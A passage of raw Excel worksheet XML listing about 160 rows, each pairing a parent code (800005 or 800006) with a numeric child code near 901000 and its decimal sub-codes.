      </c>
    </row>
    <row r="379" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A379" s="3">
        <v>800005</v>
      </c>
      <c r="B379" s="3">
        <v>901562.01</v>
      </c>
    </row>
    <row r="380" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A380" s="3">
        <v>800005</v>
      </c>
      <c r="B380" s="3">
        <v>901070</v>
      </c>
    </row>
    <row r="381" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A381" s="3">
        <v>800005</v>
      </c>
      <c r="B381" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="382" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A382" s="3">
        <v>800005</v>
      </c>
      <c r="B382" s="3">
        <v>901070.00199999998</v>
      </c>
    </row>
    <row r="383" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A383" s="3">
        <v>800005</v>
      </c>
      <c r="B383" s="3">
        <v>901070.00300000003</v>
      </c>
    </row>
    <row r="384" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A384" s="3">
        <v>800005</v>
      </c>
      <c r="B384" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="385" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A385" s="3">
        <v>800005</v>
      </c>
      <c r="B385" s="3">
        <v>901070.005</v>
      </c>
    </row>
    <row r="386" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A386" s="3">
        <v>800005</v>
      </c>
      <c r="B386" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="387" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A387" s="3">
        <v>800005</v>
      </c>
      <c r="B387" s="3">
        <v>901202</v>
      </c>
    </row>
    <row r="388" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A388" s="3">
        <v>800005</v>
      </c>
      <c r="B388" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="389" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A389" s="3">
        <v>800005</v>
      </c>
      <c r="B389" s="3">
        <v>901036.00100000005</v>
      </c>
    </row>
    <row r="390" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A390" s="3">
        <v>800005</v>
      </c>
      <c r="B390" s="3">
        <v>901036.00199999998</v>
      </c>
    </row>
    <row r="391" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A391" s="3">
        <v>800005</v>
      </c>
      <c r="B391" s="3">
        <v>901036.00300000003</v>
      </c>
    </row>
    <row r="392" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A392" s="3">
        <v>800005</v>
      </c>
      <c r="B392" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="393" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A393" s="3">
        <v>800005</v>
      </c>
      <c r="B393" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="394" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A394" s="3">
        <v>800005</v>
      </c>
      <c r="B394" s="3">
        <v>901036.00600000005</v>
      </c>
    </row>
    <row r="395" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A395" s="3">
        <v>800005</v>
      </c>
      <c r="B395" s="3">
        <v>901036.00699999998</v>
      </c>
    </row>
    <row r="396" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A396" s="3">
        <v>800005</v>
      </c>
      <c r="B396" s="3">
        <v>901556</v>
      </c>
    </row>
    <row r="397" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A397" s="3">
        <v>800005</v>
      </c>
      <c r="B397" s="3">
        <v>901556.00100000005</v>
      </c>
    </row>
    <row r="398" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A398" s="3">
        <v>800005</v>
      </c>
      <c r="B398" s="3">
        <v>901556.00199999998</v>
      </c>
    </row>
    <row r="399" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A399" s="3">
        <v>800005</v>
      </c>
      <c r="B399" s="3">
        <v>901556.00300000003</v>
      </c>
    </row>
    <row r="400" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A400" s="3">
        <v>800005</v>
      </c>
      <c r="B400" s="3">
        <v>901556.00399999996</v>
      </c>
    </row>
    <row r="401" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A401" s="3">
        <v>800005</v>
      </c>
      <c r="B401" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="402" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A402" s="3">
        <v>800005</v>
      </c>
      <c r="B402" s="3">
        <v>901578.00100000005</v>
      </c>
    </row>
    <row r="403" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A403" s="3">
        <v>800005</v>
      </c>
      <c r="B403" s="3">
        <v>901578.00199999998</v>
      </c>
    </row>
    <row r="404" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A404" s="3">
        <v>800005</v>
      </c>
      <c r="B404" s="3">
        <v>901578.00300000003</v>
      </c>
    </row>
    <row r="405" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A405" s="3">
        <v>800005</v>
      </c>
      <c r="B405" s="3">
        <v>901578.00399999996</v>
      </c>
    </row>
    <row r="406" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A406" s="3">
        <v>800005</v>
      </c>
      <c r="B406" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="407" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A407" s="3">
        <v>800005</v>
      </c>
      <c r="B407" s="3">
        <v>901601</v>
      </c>
    </row>
    <row r="408" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A408" s="3">
        <v>800005</v>
      </c>
      <c r="B408" s="3">
        <v>901601.00100000005</v>
      </c>
    </row>
    <row r="409" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A409" s="3">
        <v>800005</v>
      </c>
      <c r="B409" s="3">
        <v>901601.00199999998</v>
      </c>
    </row>
    <row r="410" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A410" s="3">
        <v>800005</v>
      </c>
      <c r="B410" s="3">
        <v>901599</v>
      </c>
    </row>
    <row r="411" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A411" s="3">
        <v>800005</v>
      </c>
      <c r="B411" s="3">
        <v>901599.00100000005</v>
      </c>
    </row>
    <row r="412" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A412" s="3">
        <v>800005</v>
      </c>
      <c r="B412" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="413" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A413" s="3">
        <v>800005</v>
      </c>
      <c r="B413" s="3">
        <v>901027.00100000005</v>
      </c>
    </row>
    <row r="414" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A414" s="3">
        <v>800005</v>
      </c>
      <c r="B414" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="415" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A415" s="3">
        <v>800005</v>
      </c>
      <c r="B415" s="3">
        <v>901027.00300000003</v>
      </c>
    </row>
    <row r="416" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A416" s="3">
        <v>800005</v>
      </c>
      <c r="B416" s="3">
        <v>901027.00399999996</v>
      </c>
    </row>
    <row r="417" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A417" s="3">
        <v>800005</v>
      </c>
      <c r="B417" s="3">
        <v>901027.005</v>
      </c>
    </row>
    <row r="418" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A418" s="3">
        <v>800005</v>
      </c>
      <c r="B418" s="3">
        <v>901027.00600000005</v>
      </c>
    </row>
    <row r="419" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A419" s="3">
        <v>800005</v>
      </c>
      <c r="B419" s="3">
        <v>901542</v>
      </c>
    </row>
    <row r="420" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A420" s="3">
        <v>800005</v>
      </c>
      <c r="B420" s="3">
        <v>901542.00100000005</v>
      </c>
    </row>
    <row r="421" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A421" s="3">
        <v>800005</v>
      </c>
      <c r="B421" s="3">
        <v>901542.00199999998</v>
      </c>
    </row>
    <row r="422" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A422" s="3">
        <v>800005</v>
      </c>
      <c r="B422" s="3">
        <v>901542.00300000003</v>
      </c>
    </row>
    <row r="423" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A423" s="3">
        <v>800005</v>
      </c>
      <c r="B423" s="3">
        <v>901542.00399999996</v>
      </c>
    </row>
    <row r="424" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A424" s="3">
        <v>800005</v>
      </c>
      <c r="B424" s="3">
        <v>901542.005</v>
      </c>
    </row>
    <row r="425" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A425" s="3">
        <v>800005</v>
      </c>
      <c r="B425" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="426" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A426" s="3">
        <v>800005</v>
      </c>
      <c r="B426" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="427" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A427" s="3">
        <v>800005</v>
      </c>
      <c r="B427" s="3">
        <v>901055.00199999998</v>
      </c>
    </row>
    <row r="428" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A428" s="3">
        <v>800005</v>
      </c>
      <c r="B428" s="3">
        <v>901055.00300000003</v>
      </c>
    </row>
    <row r="429" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A429" s="3">
        <v>800005</v>
      </c>
      <c r="B429" s="3">
        <v>901055.00399999996</v>
      </c>
    </row>
    <row r="430" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A430" s="3">
        <v>800005</v>
      </c>
      <c r="B430" s="3">
        <v>901055.005</v>
      </c>
    </row>
    <row r="431" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A431" s="3">
        <v>800005</v>
      </c>
      <c r="B431" s="3">
        <v>901055.00800000003</v>
      </c>
    </row>
    <row r="432" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A432" s="3">
        <v>800005</v>
      </c>
      <c r="B432" s="3">
        <v>901055.00899999996</v>
      </c>
    </row>
    <row r="433" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A433" s="3">
        <v>800005</v>
      </c>
      <c r="B433" s="3">
        <v>901055.01100000006</v>
      </c>
    </row>
    <row r="434" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A434" s="3">
        <v>800005</v>
      </c>
      <c r="B434" s="3">
        <v>901055.01199999999</v>
      </c>
    </row>
    <row r="435" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A435" s="3">
        <v>800005</v>
      </c>
      <c r="B435" s="3">
        <v>901055.01300000004</v>
      </c>
    </row>
    <row r="436" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A436" s="3">
        <v>800005</v>
      </c>
      <c r="B436" s="3">
        <v>901055.01399999997</v>
      </c>
    </row>
    <row r="437" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A437" s="3">
        <v>800005</v>
      </c>
      <c r="B437" s="3">
        <v>901620</v>
      </c>
    </row>
    <row r="438" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A438" s="3">
        <v>800005</v>
      </c>
      <c r="B438" s="3">
        <v>901207</v>
      </c>
    </row>
    <row r="439" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A439" s="3">
        <v>800005</v>
      </c>
      <c r="B439" s="3">
        <v>901014</v>
      </c>
    </row>
    <row r="440" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A440" s="3">
        <v>800005</v>
      </c>
      <c r="B440" s="3">
        <v>901218</v>
      </c>
    </row>
    <row r="441" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A441" s="3">
        <v>800005</v>
      </c>
      <c r="B441" s="3">
        <v>901218.00100000005</v>
      </c>
    </row>
    <row r="442" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A442" s="3">
        <v>800005</v>
      </c>
      <c r="B442" s="3">
        <v>901218.00199999998</v>
      </c>
    </row>
    <row r="443" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A443" s="3">
        <v>800005</v>
      </c>
      <c r="B443" s="3">
        <v>901218.00300000003</v>
      </c>
    </row>
    <row r="444" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A444" s="3">
        <v>800005</v>
      </c>
      <c r="B444" s="3">
        <v>901218.00399999996</v>
      </c>
    </row>
    <row r="445" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A445" s="3">
        <v>800005</v>
      </c>
      <c r="B445" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="446" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A446" s="3">
        <v>800005</v>
      </c>
      <c r="B446" s="3">
        <v>901218.00699999998</v>
      </c>
    </row>
    <row r="447" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A447" s="3">
        <v>800005</v>
      </c>
      <c r="B447" s="3">
        <v>901218.00800000003</v>
      </c>
    </row>
    <row r="448" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A448" s="3">
        <v>800005</v>
      </c>
      <c r="B448" s="3">
        <v>901218.00899999996</v>
      </c>
    </row>
    <row r="449" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A449" s="3">
        <v>800005</v>
      </c>
      <c r="B449" s="3">
        <v>901218.01</v>
      </c>
    </row>
    <row r="450" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A450" s="3">
        <v>800005</v>
      </c>
      <c r="B450" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="451" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A451" s="3">
        <v>800005</v>
      </c>
      <c r="B451" s="3">
        <v>901218.01199999999</v>
      </c>
    </row>
    <row r="452" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A452" s="3">
        <v>800005</v>
      </c>
      <c r="B452" s="3">
        <v>901218.01300000004</v>
      </c>
    </row>
    <row r="453" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A453" s="3">
        <v>800005</v>
      </c>
      <c r="B453" s="3">
        <v>901218.01399999997</v>
      </c>
    </row>
    <row r="454" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A454" s="3">
        <v>800005</v>
      </c>
      <c r="B454" s="3">
        <v>901216</v>
      </c>
    </row>
    <row r="455" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A455" s="3">
        <v>800005</v>
      </c>
      <c r="B455" s="3">
        <v>901216.00100000005</v>
      </c>
    </row>
    <row r="456" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A456" s="3">
        <v>800005</v>
      </c>
      <c r="B456" s="3">
        <v>901553</v>
      </c>
    </row>
    <row r="457" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A457" s="3">
        <v>800005</v>
      </c>
      <c r="B457" s="3">
        <v>901553.00100000005</v>
      </c>
    </row>
    <row r="458" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A458" s="3">
        <v>800005</v>
      </c>
      <c r="B458" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="459" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A459" s="3">
        <v>800005</v>
      </c>
      <c r="B459" s="3">
        <v>901553.00300000003</v>
      </c>
    </row>
    <row r="460" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A460" s="3">
        <v>800005</v>
      </c>
      <c r="B460" s="3">
        <v>901553.00399999996</v>
      </c>
    </row>
    <row r="461" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A461" s="3">
        <v>800005</v>
      </c>
      <c r="B461" s="3">
        <v>901553.005</v>
      </c>
    </row>
    <row r="462" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A462" s="3">
        <v>800005</v>
      </c>
      <c r="B462" s="3">
        <v>901553.00600000005</v>
      </c>
    </row>
    <row r="463" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A463" s="3">
        <v>800005</v>
      </c>
      <c r="B463" s="3">
        <v>901221</v>
      </c>
    </row>
    <row r="464" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A464" s="3">
        <v>800005</v>
      </c>
      <c r="B464" s="3">
        <v>901205</v>
      </c>
    </row>
    <row r="465" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A465" s="3">
        <v>800005</v>
      </c>
      <c r="B465" s="3">
        <v>901205.00100000005</v>
      </c>
    </row>
    <row r="466" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A466" s="3">
        <v>800005</v>
      </c>
      <c r="B466" s="3">
        <v>901127</v>
      </c>
    </row>
    <row r="467" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A467" s="3">
        <v>800005</v>
      </c>
      <c r="B467" s="3">
        <v>901127.00100000005</v>
      </c>
    </row>
    <row r="468" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A468" s="3">
        <v>800005</v>
      </c>
      <c r="B468" s="3">
        <v>901535</v>
      </c>
    </row>
    <row r="469" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A469" s="3">
        <v>800005</v>
      </c>
      <c r="B469" s="3">
        <v>901550</v>
      </c>
    </row>
    <row r="470" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A470" s="3">
        <v>800005</v>
      </c>
      <c r="B470" s="3">
        <v>901550.00100000005</v>
      </c>
    </row>
    <row r="471" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A471" s="3">
        <v>800005</v>
      </c>
      <c r="B471" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="472" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A472" s="3">
        <v>800005</v>
      </c>
      <c r="B472" s="3">
        <v>901550.00300000003</v>
      </c>
    </row>
    <row r="473" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A473" s="3">
        <v>800005</v>
      </c>
      <c r="B473" s="3">
        <v>901550.00399999996</v>
      </c>
    </row>
    <row r="474" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A474" s="3">
        <v>800005</v>
      </c>
      <c r="B474" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="475" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A475" s="3">
        <v>800005</v>
      </c>
      <c r="B475" s="3">
        <v>901078.00100000005</v>
      </c>
    </row>
    <row r="476" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A476" s="3">
        <v>800005</v>
      </c>
      <c r="B476" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="477" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A477" s="3">
        <v>800005</v>
      </c>
      <c r="B477" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="478" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A478" s="3">
        <v>800005</v>
      </c>
      <c r="B478" s="3">
        <v>901078.00399999996</v>
      </c>
    </row>
    <row r="479" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A479" s="3">
        <v>800005</v>
      </c>
      <c r="B479" s="3">
        <v>901497</v>
      </c>
    </row>
    <row r="480" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A480" s="3">
        <v>800005</v>
      </c>
      <c r="B480" s="3">
        <v>901497.00100000005</v>
      </c>
    </row>
    <row r="481" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A481" s="3">
        <v>800005</v>
      </c>
      <c r="B481" s="3">
        <v>901497.00199999998</v>
      </c>
    </row>
    <row r="482" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A482" s="3">
        <v>800005</v>
      </c>
      <c r="B482" s="3">
        <v>901497.00300000003</v>
      </c>
    </row>
    <row r="483" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A483" s="3">
        <v>800005</v>
      </c>
      <c r="B483" s="3">
        <v>901600</v>
      </c>
    </row>
    <row r="484" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A484" s="3">
        <v>800005</v>
      </c>
      <c r="B484" s="3">
        <v>901600.00100000005</v>
      </c>
    </row>
    <row r="485" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A485" s="3">
        <v>800005</v>
      </c>
      <c r="B485" s="3">
        <v>901600.00199999998</v>
      </c>
    </row>
    <row r="486" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A486" s="3">
        <v>800005</v>
      </c>
      <c r="B486" s="3">
        <v>901220</v>
      </c>
    </row>
    <row r="487" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A487" s="3">
        <v>800006</v>
      </c>
      <c r="B487" s="3">
        <v>901557</v>
      </c>
    </row>
    <row r="488" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A488" s="3">
        <v>800006</v>
      </c>
      <c r="B488" s="3">
        <v>901557.00100000005</v>
      </c>
    </row>
    <row r="489" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A489" s="3">
        <v>800006</v>
      </c>
      <c r="B489" s="3">
        <v>901557.00199999998</v>
      </c>
    </row>
    <row r="490" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A490" s="3">
        <v>800006</v>
      </c>
      <c r="B490" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="491" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A491" s="3">
        <v>800006</v>
      </c>
      <c r="B491" s="3">
        <v>901110.00100000005</v>
      </c>
    </row>
    <row r="492" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A492" s="3">
        <v>800006</v>
      </c>
      <c r="B492" s="3">
        <v>901110.00199999998</v>
      </c>
    </row>
    <row r="493" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A493" s="3">
        <v>800006</v>
      </c>
      <c r="B493" s="3">
        <v>901110.00300000003</v>
      </c>
    </row>
    <row r="494" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A494" s="3">
        <v>800006</v>
      </c>
      <c r="B494" s="3">
        <v>901110.00399999996</v>
      </c>
    </row>
    <row r="495" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A495" s="3">
        <v>800006</v>
      </c>
      <c r="B495" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="496" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A496" s="3">
        <v>800006</v>
      </c>
      <c r="B496" s="3">
        <v>901555.00100000005</v>
      </c>
    </row>
    <row r="497" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A497" s="3">
        <v>800006</v>
      </c>
      <c r="B497" s="3">
        <v>901555.00199999998</v>
      </c>
    </row>
    <row r="498" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A498" s="3">
        <v>800006</v>
      </c>
      <c r="B498" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="499" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A499" s="3">
        <v>800006</v>
      </c>
      <c r="B499" s="3">
        <v>901555.00399999996</v>
      </c>
    </row>
    <row r="500" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A500" s="3">
        <v>800006</v>
      </c>
      <c r="B500" s="3">
        <v>901555.005</v>
      </c>
    </row>
    <row r="501" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A501" s="3">
        <v>800006</v>
      </c>
      <c r="B501" s="3">
        <v>901212</v>
      </c>
    </row>
    <row r="502" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A502" s="3">
        <v>800006</v>
      </c>
      <c r="B502" s="3">
        <v>901187</v>
      </c>
    </row>
    <row r="503" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A503" s="3">
        <v>800006</v>
      </c>
      <c r="B503" s="3">
        <v>901606</v>
      </c>
    </row>
    <row r="504" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A504" s="3">
        <v>800006</v>
      </c>
      <c r="B504" s="3">
        <v>901606.00100000005</v>
      </c>
    </row>
    <row r="505" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A505" s="3">
        <v>800006</v>
      </c>
      <c r="B505" s="3">
        <v>901606.00199999998</v>
      </c>
    </row>
    <row r="506" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A506" s="3">
        <v>800006</v>
      </c>
      <c r="B506" s="3">
        <v>901056</v>
      </c>
    </row>
    <row r="507" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A507" s="3">
        <v>800006</v>
      </c>
      <c r="B507" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="508" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A508" s="3">
        <v>800006</v>
      </c>
      <c r="B508" s="3">
        <v>901056.00199999998</v>
      </c>
    </row>
    <row r="509" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A509" s="3">
        <v>800006</v>
      </c>
      <c r="B509" s="3">
        <v>901056.00300000003</v>
      </c>
    </row>
    <row r="510" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A510" s="3">
        <v>800006</v>
      </c>
      <c r="B510" s="3">
        <v>901056.00399999996</v>
      </c>
    </row>
    <row r="511" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A511" s="3">
        <v>800006</v>
      </c>
      <c r="B511" s="3">
        <v>901556</v>
      </c>
    </row>
    <row r="512" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A512" s="3">
        <v>800006</v>
      </c>
      <c r="B512" s="3">
        <v>901556.00100000005</v>
      </c>
    </row>
    <row r="513" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A513" s="3">
        <v>800006</v>
      </c>
      <c r="B513" s="3">
        <v>901556.00199999998</v>
      </c>
    </row>
    <row r="514" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A514" s="3">
        <v>800006</v>
      </c>
      <c r="B514" s="3">
        <v>901556.00300000003</v>
      </c>
    </row>
    <row r="515" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A515" s="3">
        <v>800006</v>
      </c>
      <c r="B515" s="3">
        <v>901556.00399999996</v>
      </c>
    </row>
    <row r="516" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A516" s="3">
        <v>800006</v>
      </c>
      <c r="B516" s="3">
        <v>901040</v>
      </c>
    </row>
    <row r="517" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A517" s="3">
        <v>800006</v>
      </c>
      <c r="B517" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="518" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A518" s="3">
        <v>800006</v>
      </c>
      <c r="B518" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="519" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A519" s="3">
        <v>800006</v>
      </c>
      <c r="B519" s="3">
        <v>901003.00199999998</v>
      </c>
    </row>
    <row r="520" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A520" s="3">
        <v>800006</v>
      </c>
      <c r="B520" s="3">
        <v>901003.00300000003</v>
      </c>
    </row>
    <row r="521" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A521" s="3">
        <v>800006</v>
      </c>
      <c r="B521" s="3">
        <v>901003.00399999996</v>
      </c>
    </row>
    <row r="522" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A522" s="3">
        <v>800006</v>
      </c>
      <c r="B522" s="3">
        <v>901003.005</v>
      </c>
    </row>
    <row r="523" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A523" s="3">
        <v>800006</v>
      </c>
      <c r="B523" s="3">
        <v>901003.00600000005</v>
      </c>
    </row>
    <row r="524" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A524" s="3">
        <v>800006</v>
      </c>
      <c r="B524" s="3">
        <v>901003.00699999998</v>
      </c>
    </row>
    <row r="525" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A525" s="3">
        <v>800006</v>
      </c>
      <c r="B525" s="3">
        <v>901003.00800000003</v>
      </c>
    </row>
    <row r="526" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A526" s="3">
        <v>800006</v>
      </c>
      <c r="B526" s="3">
        <v>901528</v>
      </c>
    </row>
    <row r="527" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A527" s="3">
        <v>800006</v>
      </c>
      <c r="B527" s="3">
        <v>901558</v>
      </c>
    </row>
    <row r="528" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A528" s="3">
        <v>800006</v>
      </c>
      <c r="B528" s="3">
        <v>901558.00100000005</v>
      </c>
    </row>
    <row r="529" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A529" s="3">
        <v>800006</v>
      </c>
      <c r="B529" s="3">
        <v>901558.00199999998</v>
      </c>
    </row>
    <row r="530" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A530" s="3">
        <v>800006</v>
      </c>
      <c r="B530" s="3">
        <v>901558.00300000003</v>
      </c>
    </row>
    <row r="531" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A531" s="3">
        <v>800006</v>
      </c>
      <c r="B531" s="3">
        <v>901558.00399999996</v>
      </c>
    </row>
    <row r="532" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A532" s="3">
        <v>800006</v>
      </c>
      <c r="B532" s="3">
        <v>901539</v>
      </c>
    </row>
    <row r="533" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A533" s="3">
        <v>800006</v>
      </c>
      <c r="B533" s="3">
        <v>901111</v>
      </c>
    </row>
    <row r="534" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A534" s="3">
        <v>800006</v>
      </c>
      <c r="B534" s="3">
        <v>901552</v>
      </c>
    </row>
    <row r="535" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A535" s="3">
        <v>800006</v>
      </c>
      <c r="B535" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="536" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A536" s="3">
        <v>800006</v>
      </c>
      <c r="B536" s="3">
        <v>901552.00199999998</v>
      </c>
    </row>
    <row r="537" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A537" s="3">
        <v>800006</v>
      </c>
